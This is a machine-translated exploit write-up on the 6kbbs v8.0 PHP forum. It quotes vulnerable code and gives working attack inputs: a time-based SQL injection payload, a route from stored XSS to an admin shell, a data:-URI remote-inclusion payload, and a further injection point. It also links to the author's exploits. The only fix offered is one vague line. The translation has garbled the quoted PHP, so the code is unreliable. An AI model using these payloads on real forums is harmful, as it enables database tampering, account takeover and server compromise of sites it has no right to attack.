6 kbbs v8.0 Forum vulnerabilities and repair

6 kbbs V8.0 is a high-performance Forum program built using PHP + MySQL. It has the advantages of concise code, convenient use, powerful functions, and extremely fast speed.

In general, magic_quotes_gpc is simulated using UTF-8 and incinit. php, and the global configuration is canceled. Numbers are strictly filtered. Character-type SQL statements are enclosed in single quotes.

1. Delayed Injection:

Ajaxmember. php? Action = deleteMsgs 80 rows

Case "deleteMsgs ":
$ Msgids =$ _ POST [msgids];
// DELETE
If (is_array ($ msgids )){
$ Delids = implode (",", $ msgids );
Echo "id in ($ delids) and touserid = {$ lg [userid]}";
$ Db-> row_delete ("msgs", "id in ($ delids) and touserid = {$ lg [userid]}"); // unfortunately, it is a deleted statement, no matter the result, only _ Y _ is returned _
}
SucceedFlag ();
Break;

No error output, forced to use the latency method: POST a msgids [a] = if (1, sleep (10), 1) to enter the database.

Operation statement: delete from 'db _ msgs 'WHERE id in (if (1, sleep (10), 1) and touserid = 1

The system uses md5 (username. userpass. Exp:

Http://www.uudisc.com/filedownload? User = k4shifz & id = 3667574

2. Cross-Site Forum:

Line 34 of ajaxmember. php sets the personal information of the Forum:

Case "modifyDetails ":
$ User = $ _ POST [user]; // The received user array is not htmlspecialchars

If (getPopedom (5) = 0 ){
$ User [usertitle] =;
}

If ($ user ["email"] = ""){
Exit ("incomplete information. ");
}

Foreach (explode (",", $ cache_settings [reservedkeyword]) as $ rkey ){
If (! Empty ($ rkey) & stristr ($ user [usertitle], $ rkey )){
Exit ("the custom title contains forbidden keywords ");
}
}

$ Db-> row_update ("users", $ user, "id = {$ lg [userid]}"); // save it to the database. The SQL statements in the function are enclosed in single quotes.
SucceedFlag ();

Forum posts are filtered out by XSS and cannot be used by XSS points such as personal signatures. The breakthrough point is to manage and edit the user's location in the background, so it is quite tricky. However, there are many shell methods in the system background. You can directly edit the script by using the following methods:

Register a user, modify personal information, and let the management background edit your user and use shell.

Use ajax to operate the background js:

Http://www.uudisc.com/user/k4shifz/file/3665675

Let's talk about the background:

There are many background vulnerabilities, such as shell, local inclusion, injection, and remote inclusion in the editing script:

Adminadmin. php
......
$ Inc = strFilter ($ _ GET [inc]);
$ Action = strFilter ($ _ GET [action]);
......
$ Inc = str_replace (., $ inc); echo $ inc;
Require_once ($ inc. ". php"); // remote inclusion, unfortunately in the background

/Admin. php? Inc = data:; base64, PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4 = // phpinfo ()

Later than 5.2.0, it is subject to allow_url_include

Pick up one injection:

Ajaxadmin. php

Case "dotopics ":
Try {
$ Postaction = $ _ POST [postaction];
$ Tids =$ _ POST [tids];
If (empty ($ tids )){
Echo ("No selected Post. ");
Return;
}
If (is_array ($ tids )){
$ Tidstr = implode (",", $ tids );
Switch ($ postaction ){

Case "delPost ":
$ Db-> row_delete ("posts", "tid in ({$ tidstr}) and fid = {$ fid}"); // enter the database for query

Author: k4shifz, edited by emotion

Fix: fix the issue based on the above Code.